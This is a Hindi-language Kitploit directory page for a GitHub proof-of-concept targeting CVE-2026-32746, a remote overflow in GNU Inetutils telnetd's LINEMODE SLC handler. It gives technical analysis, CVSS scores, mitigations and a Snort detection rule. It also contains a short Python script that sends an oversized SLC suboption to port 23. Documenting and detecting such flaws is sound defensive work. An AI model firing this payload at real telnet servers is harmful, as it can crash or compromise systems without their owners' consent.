Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-32746 — # CVE-2026-32746 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट GNU Inetutils telnetd में LINEMODE SLC बफर ओवरफ्लो के माध्यम से एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता। इसमें तकनीकी विश्लेषण, CVSS मेट्रिक्स और शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/kaleth4/cve-2026-32746
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

# CVE-2026-32746 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट GNU Inetutils telnetd में LINEMODE SLC बफर ओवरफ्लो के माध्यम से एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता। इसमें तकनीकी विश्लेषण, CVSS मेट्रिक्स और शमन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 कार्यकारी सारांश

गंभीर भेद्यता | CVSS 9.8 | रिमोट कोड निष्पादन! प्रभावित: GNU Inetutils Telnetd (2.7 से पहले के संस्करण) प्रकार: LINEMODE SLC सबऑप्शन हैंडलर में OOB Write हमला वेक्टर: नेटवर्क (पोर्ट 23) | कोई प्रमाणीकरण आवश्यक नहीं प्रभाव: Telnetd प्रक्रिया विशेषाधिकारों के साथ RCE


🎯 📖 तकनीकी विवरण

GNU Inetutils के telnetd डेमॉन के add_slc फ़ंक्शन में बफर ओवरफ्लो की पहचान की गई है। यह दोष एक दूरस्थ हमलावर को Telnet प्रोटोकॉल के सबऑप्शन में हेरफेर करके करने की अनुमति देता है।

बाउंड-आउट-ऑफ-लिमिट्स राइट (OOB Write)
SLC (Set Local Characters)
मनमाना कोड इंजेक्ट

🔍 मुख्य विवरण

  • कमजोर फ़ंक्शन: add_slc (स्थानीय वर्ण प्रसंस्करण)।
  • मूल कारण: आंतरिक बफर में सीमा सत्यापन की कमी।
  • शोषण: दुर्भावनापूर्ण LINEMODE SLC अनुक्रमों का बड़े पैमाने पर भेजना।
  • आवश्यकताएँ: कोई नहीं (पोर्ट 23 तक सीधी पहुँच)।

🛠️ 💻 प्रूफ ऑफ कॉन्सेप्ट (PoC)

एक हमलावर आंतरिक बफर को संतृप्त करने वाले दुर्भावनापूर्ण Telnet पेलोड के माध्यम से इस भेद्यता का शोषण कर सकता है:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ चेतावनी! यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। बिना प्राधिकरण के सिस्टम पर इसका उपयोग अवैध है।


📊 📈 जोखिम मेट्रिक्स (CVSS 3.1)

मेट्रिकमानविवरण
वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hरिमोट, बिना प्रमाणीकरण
स्कोर9.8 (गंभीर) 🔴गोपनीयता, अखंडता और उपलब्धता पर उच्च प्रभाव
प्रकाशन13 मार्च, 2026अंतिम संशोधन: 5 मई, 2026

🛡️ 🔒 शमन और समाधान

🚀 तत्काल समाधान

✅ GNU Inetutils को पैच किए गए संस्करण (post-2.7) में अपडेट करें।

⚡ वर्कअराउंड

🔹 telnetd अक्षम करें और SSH पर माइग्रेट करें (अनुशंसित)। 🔹 परिधि फ़ायरवॉल में पोर्ट 23 ब्लॉक करें। 🔹 असामान्य LINEMODE SLC अनुक्रमों का पता लगाने के लिए IDS/IPS कॉन्फ़िगर करें।

🛡️ अतिरिक्त सुरक्षा कॉन्फ़िगरेशन

  • Snort/Suricata नियम:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
टूल डाउनलोड करें